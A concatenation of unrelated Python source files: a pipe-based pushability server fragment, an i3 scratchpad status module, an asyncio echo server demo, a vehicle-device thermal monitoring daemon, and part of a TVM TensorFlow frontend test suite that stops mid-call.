request = PushabilityRequest.FromString(data)
start = time.perf_counter()
response = pushability.mahalanobis(request)
if len(data) == 0:
break
pass
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
def pushability_projection_loop():
try:
pushability_request = PushabilityRequest()
for attr in pushability_request.FindInitializationErrors():
setattr(pushability_request, attr, 0.0)
message_size = pushability_request.ByteSize()
request_path = get_pipe_path('PUSHABILITY_PROJECTION_REQUEST_PIPE_PATH')
response_path = get_pipe_path('PUSHABILITY_PROJECTION_RESPONSE_PIPE_PATH')
pushability = Pushability()
logging.info('Pushability projection server started')
while True:
with open(request_path, 'rb') as request_pipe:
data = request_pipe.read(message_size)
request = PushabilityRequest.FromString(data)
start = time.perf_counter()
response = pushability.projection(request)
if len(data) == 0:
break
pass
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
if __name__ == '__main__':
oracle_proc = Process(target=oracle_loop)
oracle_proc.start()
feasibility_sample_proc = Process(target=feasibility_sample_loop)
feasibility_sample_proc.start()
|
scratchpad_async.py
|
# -*- coding: utf-8 -*-
"""
Display the amount of windows and indicate urgency hints on scratchpad (async).
Configuration parameters:
always_show: whether the indicator should be shown if there are no
scratchpad windows (default False)
color_urgent: color to use if a scratchpad window is urgent (default
"#900000")
format: string to format the output (default "{} ⌫")
Requires:
i3ipc: (https://github.com/acrisci/i3ipc-python)
@author cornerman
@license BSD
"""
from threading import Thread
import i3ipc
class Py3status:
"""
"""
# available configuration parameters
always_show = False
color_urgent = "#900000"
format = "{} ⌫"
def __init__(self):
self.count = 0
self.urgent = False
t = Thread(target=self._listen)
t.daemon = True
t.start()
def scratchpad_counter(self, i3s_output_list, i3s_config):
response = {'cached_until': self.py3.CACHE_FOREVER}
if self.urgent:
response['color'] = self.color_urgent
if self.always_show or self.count > 0:
response['full_text'] = self.format.format(self.count)
else:
response['full_text'] = ''
return response
def _listen(self):
def update_scratchpad_counter(conn, e=None):
cons = conn.get_tree().scratchpad().leaves()
self.urgent = any(con for con in cons if con.urgent)
self.count = len(cons)
self.py3.update()
conn = i3ipc.Connection()
update_scratchpad_counter(conn)
conn.on('window::move', update_scratchpad_counter)
conn.on('window::urgent', update_scratchpad_counter)
conn.main()
if __name__ == "__main__":
"""
Test this module by calling it directly.
"""
from time import sleep
x = Py3status()
config = {
'color_bad': '#FF0000',
'color_degraded': '#FFFF00',
'color_good': '#00FF00'
}
while True:
print(x.scratchpad_counter([], config))
sleep(1)
|
networking_05.py
|
import asyncio
class EchoServer:
MAX_MESSAGE_SIZE = 2**16 # 65k
MESSAGE_HEADER_LEN = len(str(MAX_MESSAGE_SIZE))
def __init__(self, host='0.0.0.0', port=9800):
self._host = host
self._port = port
self._server = None
def serve(self, loop):
coro = asyncio.start_server(self.handle, self._host, self._port,
loop=loop)
self._server = loop.run_until_complete(coro)
print('Serving on %s:%s' % (self._host, self._port))
loop.run_until_complete(self._server.wait_closed())
print('Done')
@property
def started(self):
return self._server is not None and self._server.sockets
def stop(self):
print('Stopping...')
self._server.close()
async def handle(self, reader, writer):
data = await self.recv_message(reader)
await self.send_message(writer, b'ECHO: %s' % data)
# Signal we finished handling this request
# or the server will hang.
writer.close()
@classmethod
async def recv_message(cls, socket):
data_size = int(await socket.read(cls.MESSAGE_HEADER_LEN))
data = await socket.read(data_size)
return data
@classmethod
async def send_message(cls, socket, message):
if len(message) > cls.MAX_MESSAGE_SIZE:
raise ValueError('Message too big')
message_size = str(len(message)).encode('ascii')
message_size = message_size.zfill(cls.MESSAGE_HEADER_LEN)
data = message_size + message
socket.write(data)
await socket.drain()
import socket
def send_message_to_server(ip, port, message):
def _recv_message(socket):
data_size = int(socket.recv(EchoServer.MESSAGE_HEADER_LEN))
data = socket.recv(data_size)
return data
def _prepare_message(message):
if len(message) > EchoServer.MAX_MESSAGE_SIZE:
raise ValueError('Message too big')
message_size = str(len(message)).encode('ascii')
message_size = message_size.zfill(EchoServer.MESSAGE_HEADER_LEN)
return message_size + message
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(_prepare_message(message))
response = _recv_message(sock)
print("ANSWER: {}".format(response))
finally:
sock.close()
server = EchoServer()
def serve_for_3_seconds():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.call_later(3, server.stop)
server.serve(loop)
loop.close()
import threading
server_thread = threading.Thread(target=serve_for_3_seconds)
server_thread.start()
while not server.started:
pass
send_message_to_server('localhost', server._port, b"Hello World 1")
send_message_to_server('localhost', server._port, b"Hello World 2")
send_message_to_server('localhost', server._port, b"Hello World 3")
server_thread.join()
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import HARDWARE, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps', 'wifi_address'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if TICI and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
wifi_address=HARDWARE.get_ip_address(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
wifi_address='N/A',
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
restart_triggered_ts = 0.
panda_state_ts = 0.
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
# neokii
if sec_since_boot() - restart_triggered_ts < 5.:
onroad_conditions["not_restart_triggered"] = False
else:
onroad_conditions["not_restart_triggered"] = True
if params.get_bool("SoftRestartTriggered"):
params.put_bool("SoftRestartTriggered", False)
restart_triggered_ts = sec_since_boot()
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
if pandaState.pandaType != log.PandaState.PandaType.unknown:
panda_state_ts = sec_since_boot()
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
if TICI:
fan_controller = TiciFanController()
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.wifiIpAddress = last_hw_state.wifi_address
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = True #(now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = True #params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
test_forward.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This article is a test script to test tensorflow operator with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
except ImportError:
import tensorflow as tf
# Only allow TF to run on half the GPU RAM to save the other half
# For TVM
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
sess.close()
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from tvm.relay.frontend.tensorflow import from_tensorflow
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
if isinstance(o, tvm.nd.NDArray):
return [o.numpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].numpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
convert_config=None,
):
"""Generic function to compile on relay and execute on tvm"""
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def,
layout=layout,
shape=shape_dict,
outputs=out_names,
convert_config=convert_config,
)
dev = tvm.device(target, 0)
if mode == "debug":
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# Interpreter doesn't bind constants, so still need to find in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm").evaluate()(
*inputs
)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).numpy() for i in range(num_output)]
return tvm_output_list
def run_tf_graph(sess, input_data, input_node, output_node):
"""Generic function to execute tensorflow"""
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
ignore_in_shape=False,
convert_config=None,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
ignore_in_shape=ignore_in_shape,
convert_config=convert_config,
)
# since the names from tensorflow and relay runs are not exactly same,
# first len(tf_output) will be compared
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
"""One iteration of pool operation with given shapes and attributes"""
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
if isinstance(kwargs["padding"], list):
kwargs["padding"] = [kwargs["padding"][ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
def _test_pooling_dynamic(input_shape, np_shape, **kwargs):
"""Pooling with dynamic height and width dimensions."""
x = -np.arange(np.prod(np_shape), dtype=np.float32).reshape(np_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, mode="vm", ignore_in_shape=True)
@tvm.testing.uses_gpu
def test_forward_pooling():
"""Pooling"""
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling_dynamic(
input_shape=[1, None, None, 3],
np_shape=[1, 32, 32, 3],
window_shape=[2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on cpu
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
